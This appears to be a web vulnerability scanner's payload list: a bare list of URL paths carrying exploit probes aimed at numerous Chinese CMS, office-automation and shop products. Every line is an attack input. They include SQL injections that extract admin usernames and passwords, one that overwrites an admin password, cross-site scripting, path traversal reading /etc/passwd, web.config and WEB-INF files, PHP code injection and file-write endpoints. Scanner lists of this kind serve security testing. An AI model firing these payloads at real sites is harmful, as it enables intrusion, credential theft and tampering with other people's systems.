/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%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,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
